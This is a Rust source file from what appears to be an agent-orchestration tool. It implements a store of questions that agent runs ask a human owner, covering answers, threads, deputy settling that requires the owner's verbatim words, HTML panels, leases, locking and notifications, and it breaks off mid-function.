1use std::path::{Path, PathBuf};
33use std::time::Duration;
34
35use anyhow::{Context, Result, bail};
36use jiff::Timestamp;
37use serde::{Deserialize, Serialize};
38
39use crate::config;
40use crate::proc::Quiet as _;
41use crate::run::RunStatus;
42
43pub const SCHEMA: u32 = 6;
60
61const POLL: Duration = Duration::from_secs(3);
70
71const REPLY_QUIET_WINDOW: Duration = Duration::from_secs(5 * 60);
82
83const NOTIFY_TIMEOUT: Duration = Duration::from_secs(20);
89
90const WAIT_SLICE: Duration = Duration::from_secs(240);
114
115pub const LEASE_TTL: Duration = Duration::from_secs(90);
125
126const LOCK_STALE: Duration = Duration::from_secs(10);
129
130pub const WEB_URL_ENV: &str = "MAGI_WEB_URL";
141
142pub const PANEL_MAX_BYTES: u64 = 8 * 1024 * 1024;
151
152const PANEL_DIR: &str = ".panel";
158
159const PANEL_HTML: &str = "index.html";
161
162const PANEL_TMP: &str = ".panel.tmp";
164
165pub fn valid_asset_name(name: &str) -> bool {
182 if name.is_empty() || name.len() > 64 || name.contains("..") {
183 return false;
184 }
185 let mut chars = name.chars();
186 chars.next().is_some_and(|c| c.is_ascii_alphanumeric())
187 && chars.all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '_' | '-'))
188}
189
190#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
192#[serde(rename_all = "lowercase")]
193pub enum QuestionStatus {
194 Open,
196 Answered,
198 Abandoned,
202}
203
204impl QuestionStatus {
205 pub fn open(self) -> bool {
207 matches!(self, Self::Open)
208 }
209
210 pub fn as_str(self) -> &'static str {
212 match self {
213 Self::Open => "open",
214 Self::Answered => "answered",
215 Self::Abandoned => "abandoned",
216 }
217 }
218}
219
220#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
227#[serde(rename_all = "lowercase")]
228pub enum Answer {
229 Choice(String),
231 Text(String),
233}
234
235#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
243#[serde(tag = "do", rename_all = "lowercase")]
244pub enum ChoiceAction {
245 Resume {
247 run: String,
249 },
250 Requeue,
252 Done,
254}
255
256impl ChoiceAction {
257 pub fn parse(spec: &str, default_run: &str) -> Result<(String, Self)> {
262 let Some((label, verb)) = spec.rsplit_once('=') else {
263 bail!("`--action {spec}` must look like `<choice>=<resume[:run]|requeue|done>`");
264 };
265 let label = label.trim();
266 if label.is_empty() {
267 bail!("`--action {spec}` names no choice before `=`");
268 }
269 let verb = verb.trim();
270 let action = match verb.split_once(':') {
271 Some(("resume", run)) if !run.trim().is_empty() => Self::Resume {
272 run: run.trim().to_owned(),
273 },
274 None if verb == "resume" => {
275 if default_run.is_empty() {
276 bail!("`--action {spec}` names no run and MAGI_RUN is not set");
277 }
278 Self::Resume {
279 run: default_run.to_owned(),
280 }
281 }
282 None if verb == "requeue" => Self::Requeue,
283 None if verb == "done" => Self::Done,
284 _ => bail!(
285 "unknown action `{verb}` in `--action {spec}`; \
286 use resume[:<run>], requeue or done"
287 ),
288 };
289 Ok((label.to_owned(), action))
290 }
291
292 pub fn describe(&self) -> String {
294 match self {
295 Self::Resume { run } => format!("resume run {}", short(run)),
296 Self::Requeue => "requeue the task".to_owned(),
297 Self::Done => "mark the task done".to_owned(),
298 }
299 }
300}
301
302pub fn parse_actions(
305 specs: &[String],
306 choices: &[String],
307 default_run: &str,
308) -> Result<std::collections::BTreeMap<String, ChoiceAction>> {
309 let mut out = std::collections::BTreeMap::new();
310 for spec in specs {
311 let (label, action) = ChoiceAction::parse(spec, default_run)?;
312 if !choices.contains(&label) {
313 bail!(
314 "`--action {spec}`: `{label}` is not one of the --choice values ({})",
315 choices.join(", ")
316 );
317 }
318 if out.insert(label.clone(), action).is_some() {
319 bail!("more than one --action for `{label}`");
320 }
321 }
322 Ok(out)
323}
324
325#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
336#[serde(rename_all = "lowercase")]
337pub enum Who {
338 Operator,
340 Agent,
343}
344
345#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
353#[serde(deny_unknown_fields)]
354pub struct Turn {
355 pub who: Who,
357 pub body: String,
359 pub at: Timestamp,
361}
362
363#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
365#[serde(rename_all = "lowercase")]
366pub enum WaiterKind {
367 Asker,
369 Daemon,
372 Deputy,
376}
377
378#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
390pub struct Deputy {
391 pub brief: String,
394 #[serde(default)]
396 pub agent: String,
397 #[serde(default)]
399 pub seat: Option<crate::agent::SeatState>,
400 #[serde(default)]
403 pub starts: u32,
404}
405
406impl Deputy {
407 pub fn new(brief: String) -> Self {
409 Self {
410 brief,
411 agent: String::new(),
412 seat: None,
413 starts: 0,
414 }
415 }
416}
417
418pub fn deputy_seat_key(id: &str) -> String {
420 format!("deputy-{}", short(id))
421}
422
423#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
428pub struct Waiter {
429 pub kind: WaiterKind,
431 pub since: Timestamp,
433}
434
435#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
444pub struct Lease {
445 pub kind: WaiterKind,
447 pub pid: u32,
449 pub beat_at: Timestamp,
451}
452
453impl Lease {
454 pub fn fresh(&self, now: Timestamp) -> bool {
456 now.as_second() - self.beat_at.as_second() <= LEASE_TTL.as_secs() as i64
457 }
458}
459
460#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
462#[serde(deny_unknown_fields)]
463pub struct Question {
464 pub schema: u32,
466 pub id: String,
469 pub run: String,
471 pub node: String,
473 pub seat: String,
476 pub summary: String,
479 pub detail: String,
482 pub choices: Vec<String>,
486 #[serde(default)]
490 pub actions: std::collections::BTreeMap<String, ChoiceAction>,
491 #[serde(default)]
498 pub panel: bool,
499 #[serde(default)]
506 pub assets: Vec<String>,
507 pub status: QuestionStatus,
509 pub asked_at: Timestamp,
511 pub answered_at: Option<Timestamp>,
513 pub answer: Option<Answer>,
515 #[serde(default)]
524 pub thread: Vec<Turn>,
525 #[serde(default)]
540 pub answer_timeout: u64,
541 #[serde(default)]
547 pub cwd: Option<String>,
548 #[serde(default)]
550 pub waiter: Option<Waiter>,
551 #[serde(default)]
555 pub delivered_turns: usize,
556 #[serde(default)]
559 pub answer_delivered: bool,
560 #[serde(default)]
563 pub deputy: Option<Deputy>,
564 #[serde(default)]
568 pub consult: Option<ChatConsult>,
569}
570
571#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
573pub struct ChatConsult {
574 pub talk: String,
576 pub at: Timestamp,
578}
579
580impl Question {
581 pub fn run_names_task(&self) -> bool {
584 matches!(
585 self.node.as_str(),
586 crate::conduct::NODE | crate::triage::NODE | crate::triage::DEPS_NODE
587 )
588 }
589
590 pub fn new(
593 run: String,
594 node: String,
595 seat: String,
596 summary: String,
597 detail: String,
598 choices: Vec<String>,
599 ) -> Self {
600 Self {
601 schema: SCHEMA,
602 id: new_id(),
603 run,
604 node,
605 seat,
606 summary,
607 detail,
608 choices,
609 actions: std::collections::BTreeMap::new(),
610 panel: false,
611 assets: Vec::new(),
612 status: QuestionStatus::Open,
613 asked_at: Timestamp::now(),
614 answered_at: None,
615 answer: None,
616 thread: Vec::new(),
617 answer_timeout: 0,
618 cwd: None,
619 waiter: None,
620 delivered_turns: 0,
621 answer_delivered: false,
622 deputy: None,
623 consult: None,
624 }
625 }
626
627 pub fn short(&self) -> &str {
629 short(&self.id)
630 }
631
632 pub fn chosen_action(&self) -> Option<&ChoiceAction> {
635 match (&self.status, &self.answer) {
636 (QuestionStatus::Answered, Some(Answer::Choice(c))) => self.actions.get(c),
637 _ => None,
638 }
639 }
640
641 pub fn free_text(&self) -> bool {
643 self.choices.is_empty()
644 }
645
646 pub fn answer(&mut self, answer: Answer) -> Result<()> {
656 match self.status {
657 QuestionStatus::Answered => bail!(
658 "question {} was already answered; the run has moved on and a \
659 second answer would be a decision nobody acted on",
660 self.short()
661 ),
662 QuestionStatus::Abandoned => bail!(
663 "question {} was abandoned and the run behind it is gone",
664 self.short()
665 ),
666 QuestionStatus::Open => {}
667 }
668 let body = match &answer {
669 Answer::Choice(c) | Answer::Text(c) => c.as_str(),
670 };
671 if body.trim().is_empty() {
672 bail!(
673 "question {} needs an answer; an empty one tells the agent \
674 nothing and it would guess anyway",
675 self.short()
676 );
677 }
678 match &answer {
679 Answer::Choice(c) if self.free_text() => bail!(
680 "question {} asks for free text, so `{c}` cannot be a choice \
681 it offered",
682 self.short()
683 ),
684 Answer::Choice(c) if !self.choices.iter().any(|o| o == c) => bail!(
685 "`{c}` is not one of the choices question {} offers: {}",
686 self.short(),
687 self.choices.join(", ")
688 ),
689 Answer::Text(_) if !self.free_text() => bail!(
690 "question {} is multiple choice; answer with one of: {}",
691 self.short(),
692 self.choices.join(", ")
693 ),
694 _ => {}
695 }
696 self.answered_at = Some(Timestamp::now());
697 self.answer = Some(answer);
698 self.status = QuestionStatus::Answered;
699 Ok(())
700 }
701
702 pub fn abandon(&mut self, why: impl Into<String>) {
714 if !self.status.open() {
715 return;
716 }
717 self.status = QuestionStatus::Abandoned;
718 let why = why.into();
719 let why = why.trim();
720 if why.is_empty() {
721 return;
722 }
723 if !self.detail.is_empty() {
724 self.detail.push('\n');
725 }
726 self.detail.push_str("\n_Abandoned: ");
727 self.detail.push_str(why);
728 self.detail.push_str("._\n");
729 }
730
731 pub fn resolution(&self) -> Option<String> {
738 match (self.status, &self.answer) {
739 (QuestionStatus::Answered, Some(Answer::Choice(a) | Answer::Text(a))) => {
740 Some(a.clone())
741 }
742 _ => None,
743 }
744 }
745
746 pub fn settle_by_deputy(&mut self, seat: &str, label: &str, quote: &str) -> Result<()> {
757 let Some(deputy) = &self.deputy else {
758 bail!("question {} has no deputy", self.short());
759 };
760 let own = deputy.seat.as_ref().map(|s| s.key.as_str());
761 if own != Some(seat) {
762 bail!("only the deputy of question {} may settle it", self.short());
763 }
764 if !self.choices.iter().any(|c| c == label) {
765 bail!(
766 "`{label}` is not one of the choices offered on question {}",
767 self.short()
768 );
769 }
770 let quote = quote.trim();
771 if quote.is_empty()
772 || !self
773 .thread
774 .iter()
775 .any(|t| t.who == Who::Operator && t.body.contains(quote))
776 {
777 bail!(
778 "the quote is not something the owner said on question {}",
779 self.short()
780 );
781 }
782 let latest = self
785 .thread
786 .iter()
787 .rev()
788 .find(|t| t.who == Who::Operator)
789 .map(|t| t.body.trim());
790 if crate::deputy::merge_gated(self) {
791 let ok = if label == crate::land::APPROVE {
797 latest.is_some_and(|m| m.contains(quote))
798 } else if label == crate::land::HOLD {
799 latest.is_some_and(|m| {
800 quote.eq_ignore_ascii_case(label) && m.eq_ignore_ascii_case(label)
801 })
802 } else {
803 false
804 };
805 if !ok {
806 bail!(
807 "on a merge approval `{label}` settles it only when the quote is a \
808 verbatim part of the owner's latest message ({}); if the wording is \
809 doubtful, ask what they mean with `--thread` instead",
810 if label == crate::land::HOLD {
811 "for `hold`, the whole message"
812 } else {
813 "the quote must be the instruction itself"
814 }
815 );
816 }
817 } else if crate::deputy::destructive(self, label)
818 && !latest.is_some_and(|m| crate::land::unhedged(m, quote))
819 {
820 bail!(
821 "`{label}` cannot be undone; it settles question {} only when the owner's \
822 latest message clearly says so, unhedged and quoted verbatim (no maybe / if \
823 / not / question); ask what they mean with `--thread` instead",
824 self.short()
825 );
826 }
827 self.thread.push(Turn {
828 who: Who::Agent,
829 body: format!("Settled as `{label}` on the owner's words: \"{quote}\""),
830 at: Timestamp::now(),
831 });
832 self.delivered_turns = self.thread.len();
833 self.answer(Answer::Choice(label.to_owned()))
834 }
835
836 pub fn say(&mut self, body: impl Into<String>) -> Result<()> {
847 match self.status {
848 QuestionStatus::Answered => bail!(
849 "question {} was already answered; there is nothing left to \
850 discuss",
851 self.short()
852 ),
853 QuestionStatus::Abandoned => bail!(
854 "question {} was abandoned and the run behind it is gone",
855 self.short()
856 ),
857 QuestionStatus::Open => {}
858 }
859 let body = body.into();
860 if body.trim().is_empty() {
861 bail!("a message to question {} cannot be empty", self.short());
862 }
863 self.thread.push(Turn {
864 who: Who::Operator,
865 body,
866 at: Timestamp::now(),
867 });
868 Ok(())
869 }
870
871 pub fn reply(&mut self, body: impl Into<String>, choices: Vec<String>) -> Result<()> {
881 match self.status {
882 QuestionStatus::Answered => bail!(
883 "question {} was already answered; replying now would not \
884 reach anyone",
885 self.short()
886 ),
887 QuestionStatus::Abandoned => bail!(
888 "question {} was abandoned and the run behind it is gone",
889 self.short()
890 ),
891 QuestionStatus::Open => {}
892 }
893 let body = body.into();
894 if body.trim().is_empty() {
895 bail!("a reply to question {} cannot be empty", self.short());
896 }
897 self.actions.retain(|label, _| choices.contains(label));
899 self.choices = choices;
900 let unread = self.unread_from_owner().is_some();
901 self.thread.push(Turn {
902 who: Who::Agent,
903 body,
904 at: Timestamp::now(),
905 });
906 if !unread {
910 self.delivered_turns = self.thread.len();
911 }
912 Ok(())
913 }
914
915 pub fn unread_from_owner(&self) -> Option<String> {
922 if !self.status.open() {
923 return None;
924 }
925 let said = self.undelivered_owner_turns();
926 (!said.is_empty()).then(|| said.join("\n\n"))
927 }
928
929 pub fn undelivered_owner_turns(&self) -> Vec<&str> {
935 let from = self.delivered_turns.min(self.thread.len());
936 self.thread[from..]
937 .iter()
938 .filter(|t| t.who == Who::Operator)
939 .map(|t| t.body.as_str())
940 .collect()
941 }
942
943 pub fn last_activity(&self) -> i64 {
947 self.thread
948 .iter()
949 .map(|t| t.at.as_second())
950 .max()
951 .unwrap_or(0)
952 .max(self.asked_at.as_second())
953 }
954
955 pub fn waiting_on_agent(&self) -> bool {
964 self.status.open() && matches!(self.thread.last(), Some(t) if t.who == Who::Operator)
965 }
966
967 fn should_notify(&self, now: Timestamp) -> bool {
975 let Some(last) = self
976 .thread
977 .iter()
978 .rev()
979 .find(|t| t.who == Who::Operator)
980 .map(|t| t.at)
981 else {
982 return true;
983 };
984 now.as_second() - last.as_second() > REPLY_QUIET_WINDOW.as_secs() as i64
985 }
986}
987
988#[derive(Debug, Clone)]
990pub struct Questions {
991 root: PathBuf,
992}
993
994impl Questions {
995 pub fn open() -> Self {
997 Self::at(crate::run::home().join("questions"))
998 }
999
1000 pub fn at(root: PathBuf) -> Self {
1003 Self { root }
1004 }
1005
1006 pub fn root(&self) -> &Path {
1008 &self.root
1009 }
1010
1011 pub fn path_of(&self, id: &str) -> PathBuf {
1013 self.root.join(format!("{id}.json"))
1014 }
1015
1016 pub fn panel_dir(&self, id: &str) -> PathBuf {
1018 self.root.join(format!("{id}{PANEL_DIR}"))
1019 }
1020
1021 pub fn put_panel(&self, q: &mut Question, html: &str, assets: &[PathBuf]) -> Result<()> {
1045 if !valid_asset_name(&q.id) {
1046 bail!(
1047 "question id `{}` is not a name magi will build a panel path from",
1048 q.id
1049 );
1050 }
1051 if html.trim().is_empty() {
1052 bail!(
1053 "question {} was handed an empty panel; an empty frame reads to \
1054 the owner as \"the agent had nothing to say\", which is a lie",
1055 q.short()
1056 );
1057 }
1058
1059 let mut named: Vec<(String, &Path)> = Vec::with_capacity(assets.len());
1062 for src in assets {
1063 let name = src.file_name().and_then(|n| n.to_str()).unwrap_or_default();
1064 if !valid_asset_name(name) {
1065 bail!(
1066 "panel asset `{}` cannot be stored: a panel file name must \
1067 match ^[A-Za-z0-9][A-Za-z0-9._-]{{0,63}}$ and contain no `..`",
1068 src.display()
1069 );
1070 }
1071 if let Some((_, first)) = named.iter().find(|(n, _)| n == name) {
1072 bail!(
1073 "two panel assets are both named `{name}` - {} and {} - and \
1074 the panel can only show one of them; rename one at the source",
1075 first.display(),
1076 src.display()
1077 );
1078 }
1079 named.push((name.to_owned(), src.as_path()));
1080 }
1081
1082 let mut total = html.len() as u64;
1083 for (_, src) in &named {
1084 let meta = std::fs::metadata(src)
1085 .with_context(|| format!("stat panel asset {}", src.display()))?;
1086 if !meta.is_file() {
1087 bail!(
1088 "panel asset `{}` is not a file; a panel is html plus files \
1089 copied beside it",
1090 src.display()
1091 );
1092 }
1093 total = total.saturating_add(meta.len());
1094 }
1095 if total > PANEL_MAX_BYTES {
1096 bail!(
1097 "panel for question {} is {total} bytes, over magi's cap of \
1098 {PANEL_MAX_BYTES} bytes; nothing was written",
1099 q.short()
1100 );
1101 }
1102
1103 let tmp = self.root.join(format!("{}{PANEL_TMP}", q.id));
1104 let dir = self.panel_dir(&q.id);
1105 std::fs::create_dir_all(&self.root)
1106 .with_context(|| format!("create {}", self.root.display()))?;
1107 clear_dir(&tmp)?;
1108 std::fs::create_dir(&tmp).with_context(|| format!("create {}", tmp.display()))?;
1109 if let Err(e) = fill_panel(&tmp, html, &named) {
1110 let _ = std::fs::remove_dir_all(&tmp);
1113 return Err(e);
1114 }
1115 clear_dir(&dir)?;
1116 std::fs::rename(&tmp, &dir)
1117 .with_context(|| format!("move panel into {}", dir.display()))?;
1118
1119 q.panel = true;
1120 q.assets = named.into_iter().map(|(n, _)| n).collect();
1121 q.assets.sort_unstable();
1122 Ok(())
1123 }
1124
1125 pub fn panel_html(&self, id: &str) -> Option<String> {
1131 if !valid_asset_name(id) {
1132 return None;
1133 }
1134 std::fs::read_to_string(self.panel_dir(id).join(PANEL_HTML)).ok()
1135 }
1136
1137 pub fn panel_asset(&self, id: &str, name: &str) -> Result<Option<Vec<u8>>> {
1148 if !valid_asset_name(name) {
1149 bail!(
1150 "`{name}` is not a panel file name; it must match \
1151 ^[A-Za-z0-9][A-Za-z0-9._-]{{0,63}}$ and contain no `..`"
1152 );
1153 }
1154 if !valid_asset_name(id) {
1155 return Ok(None);
1156 }
1157 let dir = self.panel_dir(id);
1158 if !dir.is_dir() {
1159 return Ok(None);
1160 }
1161 let path = dir.join(name);
1162 match std::fs::read(&path) {
1163 Ok(bytes) => Ok(Some(bytes)),
1164 Err(e) if e.kind() == std::io::ErrorKind::NotFound => Ok(None),
1165 Err(e) => Err(e).with_context(|| format!("read {}", path.display())),
1166 }
1167 }
1168
1169 pub fn drop_panel(&self, id: &str) -> Result<()> {
1178 if !valid_asset_name(id) {
1179 bail!("question id `{id}` is not a name magi will build a panel path from");
1180 }
1181 clear_dir(&self.panel_dir(id))?;
1182 clear_dir(&self.root.join(format!("{id}{PANEL_TMP}")))
1183 }
1184
1185 pub fn lease_path(&self, id: &str) -> PathBuf {
1187 self.root.join(format!("{id}.lease"))
1188 }
1189
1190 pub fn read_lease(&self, id: &str) -> Option<Lease> {
1192 let body = std::fs::read_to_string(self.lease_path(id)).ok()?;
1193 serde_json::from_str(&body).ok()
1194 }
1195
1196 pub fn beat(&self, id: &str, kind: WaiterKind) {
1203 let lease = Lease {
1204 kind,
1205 pid: std::process::id(),
1206 beat_at: Timestamp::now(),
1207 };
1208 let path = self.lease_path(id);
1209 let tmp = path.with_extension("lease.tmp");
1210 let written = std::fs::create_dir_all(&self.root)
1211 .and_then(|()| std::fs::write(&tmp, serde_json::to_string(&lease).unwrap_or_default()))
1212 .and_then(|()| std::fs::rename(&tmp, &path));
1213 if let Err(e) = written {
1214 tracing::debug!("could not beat the lease on question {id}: {e}");
1215 }
1216 }
1217
1218 pub fn drop_lease(&self, id: &str) {
1220 let _ = std::fs::remove_file(self.lease_path(id));
1221 }
1222
1223 pub fn update<T>(
1234 &self,
1235 id: &str,
1236 f: impl FnOnce(&mut Question) -> Result<T>,
1237 ) -> Result<(Question, T)> {
1238 std::fs::create_dir_all(&self.root)
1239 .with_context(|| format!("create {}", self.root.display()))?;
1240 let lock = self.root.join(format!("{id}.lock"));
1241 let started = std::time::Instant::now();
1242 loop {
1243 match std::fs::OpenOptions::new()
1244 .write(true)
1245 .create_new(true)
1246 .open(&lock)
1247 {
1248 Ok(_) => break,
1249 Err(e) if e.kind() == std::io::ErrorKind::AlreadyExists => {
1250 let stale = std::fs::metadata(&lock)
1251 .and_then(|m| m.modified())
1252 .ok()
1253 .and_then(|t| t.elapsed().ok())
1254 .is_some_and(|age| age > LOCK_STALE);
1255 if stale {
1256 let _ = std::fs::remove_file(&lock);
1257 } else if started.elapsed() > LOCK_STALE {
1258 bail!("could not lock question {id}");
1259 } else {
1260 std::thread::sleep(Duration::from_millis(15));
1261 }
1262 }
1263 Err(e) => return Err(e).with_context(|| format!("lock {}", lock.display())),
1264 }
1265 }
1266 struct Unlock(PathBuf);
1267 impl Drop for Unlock {
1268 fn drop(&mut self) {
1269 let _ = std::fs::remove_file(&self.0);
1270 }
1271 }
1272 let _guard = Unlock(lock);
1273 let mut q = read_path(&self.path_of(id))?;
1274 let out = f(&mut q)?;
1275 self.put(&mut q)?;
1276 Ok((q, out))
1277 }
1278
1279 pub fn put(&self, q: &mut Question) -> Result<()> {
1283 std::fs::create_dir_all(&self.root)
1284 .with_context(|| format!("create {}", self.root.display()))?;
1285 let body = serde_json::to_string_pretty(q).context("serialize question")?;
1286 let path = self.path_of(&q.id);
1287 let tmp = path.with_extension("json.tmp");
1288 let is_new = !path.exists();
1289 std::fs::write(&tmp, &body).with_context(|| format!("write {}", tmp.display()))?;
1290 std::fs::rename(&tmp, &path).with_context(|| format!("replace {}", path.display()))?;
1291 if is_new
1294 && q.status.open()
1295 && q.node != crate::bump::NOTICE_NODE
1296 && let Some(home) = self.root.parent().filter(|p| !p.as_os_str().is_empty())
1297 {
1298 crate::notices::quiet_for(home, q);
1299 }
1300 Ok(())
1301 }
1302
1303 pub fn get(&self, id: &str) -> Result<Question> {
1305 let resolved = self.resolve_id(id)?;
1306 read_path(&self.path_of(&resolved))
1307 }
1308
1309 pub fn list(&self) -> Vec<Question> {
1317 let mut all: Vec<Question> = std::fs::read_dir(&self.root)
1318 .into_iter()
1319 .flatten()
1320 .flatten()
1321 .map(|e| e.path())
1322 .filter(|p| p.extension().is_some_and(|x| x == "json"))
1323 .filter_map(|p| read_path(&p).ok())
1324 .collect();
1325 all.sort_unstable_by(|a, b| {
1326 let rank = |q: &Question| u8::from(!q.status.open());
1327 rank(a).cmp(&rank(b)).then_with(|| b.id.cmp(&a.id))
1328 });
1329 all
1330 }
1331
1332 pub fn open_for(&self, run: &str) -> Vec<Question> {
1338 self.list()
1339 .into_iter()
1340 .filter(|q| q.status.open() && q.run == run)
1341 .collect()
1342 }
1343
1344 pub fn abandon_for_run(&self, run: &str, why: &str) -> Result<usize> {
1357 let mut abandoned = 0;
1358 for mut q in self.open_for(run) {
1359 q.abandon(why);
1360 self.put(&mut q)?;
1361 abandoned += 1;
1362 }
1363 Ok(abandoned)
1364 }
1365
1366 pub fn settle_run(&self, run: &str, status: RunStatus) -> Result<usize> {
1390 if status.resumable() {
1391 return Ok(0);
1392 }
1393 let why = format!(
1394 "run {run} {}, so nothing is waiting for this answer",
1395 status.as_str()
1396 );
1397 let mut abandoned = 0;
1402 for mut q in self.open_for(run) {
1403 if q.node == crate::bump::NOTICE_NODE {
1404 continue;
1405 }
1406 q.abandon(&why);
1407 self.put(&mut q)?;
1408 abandoned += 1;
1409 }
1410 Ok(abandoned)
1411 }
1412
1413 pub fn resolve_id(&self, prefix: &str) -> Result<String> {
1416 if self.path_of(prefix).is_file() {
1417 return Ok(prefix.to_owned());
1418 }
1419 let hits: Vec<String> = self
1420 .list()
1421 .into_iter()
1422 .map(|q| q.id)
1423 .filter(|id| id.starts_with(prefix) || id.ends_with(prefix))
1424 .collect();
1425 match hits.len() {
1426 1 => Ok(hits.into_iter().next().expect("exactly one hit")),
1427 0 => bail!("no question matches `{prefix}`"),
1428 _ => bail!(
1429 "`{prefix}` matches {} questions: {}",
1430 hits.len(),
1431 hits.join(", ")
1432 ),
1433 }
1434 }
1435
1436 pub fn revision(&self) -> u64 {
1440 std::fs::read_dir(&self.root)
1441 .into_iter()
1442 .flatten()
1443 .flatten()
1444 .filter_map(|e| e.metadata().ok())
1445 .filter_map(|m| m.modified().ok())
1446 .filter_map(|t| t.duration_since(std::time::UNIX_EPOCH).ok())
1447 .map(|d| d.as_millis() as u64)
1448 .max()
1449 .unwrap_or(0)
1450 }
1451
1452 pub fn count_open(&self) -> usize {
1458 self.list().iter().filter(|q| q.status.open()).count()
1459 }
1460
1461 pub fn count_needs_owner(&self) -> usize {
1470 self.list()
1471 .iter()
1472 .filter(|q| q.status.open() && !q.waiting_on_agent())
1473 .count()
1474 }
1475}
1476
1477#[derive(Debug, Clone, PartialEq, Eq)]
1479pub enum Wait {
1480 Answered(String),
1482 Replied(String),
1487 Pending,
1494 Abandoned,
1499}
1500
1501pub async fn ask_and_wait(
1508 q: &mut Question,
1509 store: &Questions,
1510 notify: &config::Notify,
1511 timeout: Duration,
1512) -> Result<Wait> {
1513 wait_for_owner(q, store, notify, timeout, POLL).await
1514}
1515
1516pub async fn resume_wait(q: &mut Question, store: &Questions, timeout: Duration) -> Result<Wait> {
1531 wait_loop(q, store, timeout, WAIT_SLICE, POLL).await
1532}
1533
1534async fn wait_for_owner(
1540 q: &mut Question,
1541 store: &Questions,
1542 cfg: &config::Notify,
1543 timeout: Duration,
1544 poll: Duration,
1545) -> Result<Wait> {
1546 if !store.path_of(&q.id).is_file() {
1550 store.put(q).context("file the question")?;
1551 }
1552 if q.should_notify(Timestamp::now()) {
1553 if let Err(e) = notify(cfg, q).await {
1554 tracing::warn!(
1559 "could not notify about question {}: {e:#} - the web UI is the \
1560 only surface for it now",
1561 q.short()
1562 );
1563 }
1564 }
1565 tracing::info!(
1566 "question {} from {} is waiting for you: {}",
1567 q.short(),
1568 q.seat,
1569 q.summary
1570 );
1571 wait_loop(q, store, timeout, WAIT_SLICE, poll).await
1572}
1573
1574fn hold(store: &Questions, id: &str) {
1576 store.beat(id, WaiterKind::Asker);
1577 let took = store.update(id, |q| {
1578 if q.status.open() {
1579 q.waiter = Some(Waiter {
1580 kind: WaiterKind::Asker,
1581 since: Timestamp::now(),
1582 });
1583 }
1584 Ok(())
1585 });
1586 if let Err(e) = took {
1587 tracing::debug!("could not note the wait on question {id}: {e:#}");
1588 }
1589}
1590
1591pub fn hand_over(store: &Questions, q: &mut Question) {
1599 let done = store.update(&q.id, |r| {
1600 r.delivered_turns = r.delivered_turns.max(q.thread.len());
1601 if r.status == QuestionStatus::Answered {
1602 r.answer_delivered = true;
1603 }
1604 r.waiter = None;
1605 Ok(())
1606 });
1607 match done {
1608 Ok((fresh, ())) => *q = fresh,
1609 Err(e) => tracing::debug!("could not record the hand-over of {}: {e:#}", q.short()),
1610 }
1611}
1612
1613pub fn answer_for_agent(q: &Question, answer: &str) -> String {
1617 let says = q.undelivered_owner_turns();
1618 if says.is_empty() {
1619 return answer.to_owned();
1620 }
1621 format!(
1622 "the owner also said, before answering:\n\n{}\n\nthe owner answered:\n\n{answer}",
1623 says.join("\n\n")
1624 )
1625}
1626
1627pub fn deliver_answer(
1630 store: &Questions,
1631 q: &mut Question,
1632 answer: &str,
1633 out: &mut impl std::io::Write,
1634) -> std::io::Result<()> {
1635 writeln!(out, "{}", answer_for_agent(q, answer))?;
1636 out.flush()?;
1637 hand_over(store, q);
1638 Ok(())
1639}
1640
1641async fn wait_loop(
1651 q: &mut Question,
1652 store: &Questions,
1653 timeout: Duration,
1654 slice: Duration,
1655 poll: Duration,
1656) -> Result<Wait> {
1657 if let Some(said) = q.unread_from_owner() {
1667 return Ok(Wait::Replied(said));
1668 }
1669 hold(store, &q.id);
1670
1671 let bounded = timeout.min(slice);
1672 let is_the_real_deadline = bounded >= timeout;
1673 let deadline = tokio::time::Instant::now() + bounded;
1674 loop {
1675 let now = tokio::time::Instant::now();
1676 if now >= deadline {
1677 if !is_the_real_deadline {
1678 return Ok(Wait::Pending);
1682 }
1683 let why = format!("no answer within {}s of asking", timeout.as_secs().max(1));
1684 let (fresh, unread) = store
1688 .update(&q.id, |r| {
1689 let unread = r.unread_from_owner();
1690 if unread.is_none() {
1691 r.abandon(&why);
1692 r.waiter = None;
1693 }
1694 Ok(unread)
1695 })
1696 .context("record the abandoned question")?;
1697 *q = fresh;
1698 if let Some(said) = unread {
1699 return Ok(Wait::Replied(said));
1700 }
1701 tracing::warn!(
1702 "question {} went unanswered for {}s; the run parks and the \
1703 question stays as the record of it",
1704 q.short(),
1705 timeout.as_secs()
1706 );
1707 return Ok(Wait::Abandoned);
1708 }
1709 tokio::time::sleep(poll.min(deadline - now)).await;
1710 store.beat(&q.id, WaiterKind::Asker);
1711 match store.get(&q.id) {
1712 Ok(fresh) if !fresh.status.open() => {
1713 *q = fresh;
1717 return Ok(match q.resolution() {
1718 Some(a) => Wait::Answered(a),
1719 None => Wait::Abandoned,
1722 });
1723 }
1724 Ok(fresh) => {
1725 if let Some(said) = fresh.unread_from_owner() {
1726 *q = fresh;
1727 return Ok(Wait::Replied(said));
1728 }
1729 }
1732 Err(e) => {
1733 tracing::debug!("could not re-read question {}: {e:#}", q.short());
1737 }
1738 }
1739 }
1740}
1741
1742pub async fn notify(cmd: &config::Notify, q: &Question) -> Result<()> {
1753 notify_text(cmd, &q.run, &q.summary).await
1754}
1755
1756pub async fn notify_text(cmd: &config::Notify, run: &str, summary: &str) -> Result<()> {
1759 let Some((program, args)) = cmd.command.split_first() else {
1760 return Ok(());
1762 };
1763 let url = web_url();
1764 if url.is_empty() && cmd.command.iter().any(|a| a.contains("{url}")) {
1765 tracing::warn!(
1766 "the notification command uses {{url}} but {WEB_URL_ENV} is unset, \
1767 so the link will be empty - export it next to `magi serve` with \
1768 the address `magi web --open` printed"
1769 );
1770 }
1771 let argv: Vec<String> = args.iter().map(|a| expand(a, run, summary, &url)).collect();
1772 tracing::debug!(program = %program, args = ?argv, "notifying");
1773
1774 let mut child = tokio::process::Command::new(program);
1775 child.quiet();
1776 child
1777 .args(&argv)
1778 .stdin(std::process::Stdio::null())
